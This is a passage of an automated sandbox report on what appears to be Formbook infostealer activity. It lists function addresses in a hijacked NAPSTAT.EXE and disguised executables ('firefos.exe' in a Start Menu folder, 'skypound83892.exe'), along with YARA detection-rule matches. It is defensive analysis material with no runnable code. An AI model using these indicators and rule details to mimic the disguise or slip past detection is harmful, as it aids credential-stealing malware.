          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0216148912_2_02161489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215351F12_2_0215351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0219654012_2_02196540
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0216C5F012_2_0216C5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D05E312_2_021D05E3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02203A8312_2_02203A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02177B0012_2_02177B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021FCBA412_2_021FCBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214FBD712_2_0214FBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021DDBDA12_2_021DDBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D6BCB12_2_021D6BCB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215C85C12_2_0215C85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0217286D12_2_0217286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021CF8C412_2_021CF8C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021EF8EE12_2_021EF8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D595512_2_021D5955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D394B12_2_021D394B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F098E12_2_021F098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021529B212_2_021529B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021669FE12_2_021669FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02182E2F12_2_02182E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0216EE4C12_2_0216EE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02160F3F12_2_02160F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0217DF7C12_2_0217DF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021ECFB112_2_021ECFB1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021C2FDC12_2_021C2FDC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02180D3B12_2_02180D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215CD5B12_2_0215CD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021EFDDD12_2_021EFDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00128C6012_2_00128C60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013CD3A12_2_0013CD3A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00122D9012_2_00122D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00122D8712_2_00122D87
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00122FB012_2_00122FB0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C712_2_008B67C7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B506212_2_008B5062
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B32FF12_2_008B32FF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B330212_2_008B3302
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B136212_2_008B1362
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B75B212_2_008B75B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B08F912_2_008B08F9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B090212_2_008B0902
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0040103015_2_00401030
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041BA0215_2_0041BA02
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00408C6015_2_00408C60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B4A315_2_0041B4A3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041CD3A15_2_0041CD3A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00402D8715_2_00402D87
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00402D9015_2_00402D90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041BFCC15_2_0041BFCC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00402FB015_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094E0C615_2_0094E0C6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0097D00515_2_0097D005
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096905A15_2_0096905A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095304015_2_00953040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094E2E915_2_0094E2E9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009F123815_2_009F1238
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009763DB15_2_009763DB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094F3CF15_2_0094F3CF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095230515_2_00952305
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095735315_2_00957353
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0099A37B15_2_0099A37B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0098548515_2_00985485
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096148915_2_00961489
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0098D47D15_2_0098D47D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096C5F015_2_0096C5F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095351F15_2_0095351F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0099654015_2_00996540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095468015_2_00954680
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095E6C115_2_0095E6C1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009F262215_2_009F2622
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009D579A15_2_009D579A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095C7BC15_2_0095C7BC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009857C315_2_009857C3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009EF8EE15_2_009EF8EE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095C85C15_2_0095C85C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0097286D15_2_0097286D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009F098E15_2_009F098E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009529B215_2_009529B2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009669FE15_2_009669FE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009D595515_2_009D5955
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00A03A8315_2_00A03A83
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009FCBA415_2_009FCBA4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094FBD715_2_0094FBD7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009DDBDA15_2_009DDBDA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00977B0015_2_00977B00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009EFDDD15_2_009EFDDD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00980D3B15_2_00980D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095CD5B15_2_0095CD5B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00982E2F15_2_00982E2F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096EE4C15_2_0096EE4C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00960F3F15_2_00960F3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0097DF7C15_2_0097DF7C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BE0C616_2_008BE0C6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008ED00516_2_008ED005
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C304016_2_008C3040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D905A16_2_008D905A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BE2E916_2_008BE2E9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0096123816_2_00961238
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_009663BF16_2_009663BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BF3CF16_2_008BF3CF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008E63DB16_2_008E63DB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C230516_2_008C2305
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C735316_2_008C7353
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0090A37B16_2_0090A37B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D148916_2_008D1489
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F548516_2_008F5485
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008FD47D16_2_008FD47D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008DC5F016_2_008DC5F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C351F16_2_008C351F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0090654016_2_00906540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C468016_2_008C4680
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CE6C116_2_008CE6C1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0090A63416_2_0090A634
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0096262216_2_00962622
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0094579A16_2_0094579A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CC7BC16_2_008CC7BC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F57C316_2_008F57C3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0095F8EE16_2_0095F8EE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CC85C16_2_008CC85C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008E286D16_2_008E286D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0096098E16_2_0096098E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C29B216_2_008C29B2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D69FE16_2_008D69FE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0094595516_2_00945955
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_00973A8316_2_00973A83
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0096CBA416_2_0096CBA4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0094DBDA16_2_0094DBDA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BFBD716_2_008BFBD7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008E7B0016_2_008E7B00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0095FDDD16_2_0095FDDD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F0D3B16_2_008F0D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CCD5B16_2_008CCD5B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F2E2F16_2_008F2E2F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008DEE4C16_2_008DEE4C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0095CFB116_2_0095CFB1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D0F3F16_2_008D0F3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008EDF7C16_2_008EDF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0214DF5C appears 123 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0214E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 021BF970 appears 84 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0219373B appears 245 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02193F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 008BDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0090373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 00993F92 appears 108 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0092F970 appears 81 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 00903F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0099373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 009BF970 appears 81 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0094E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 008BE2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0094DF5C appears 118 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 00993F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 0099373B appears 248 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 009BF970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 0094E2A8 appears 60 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 0094DF5C appears 130 times
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
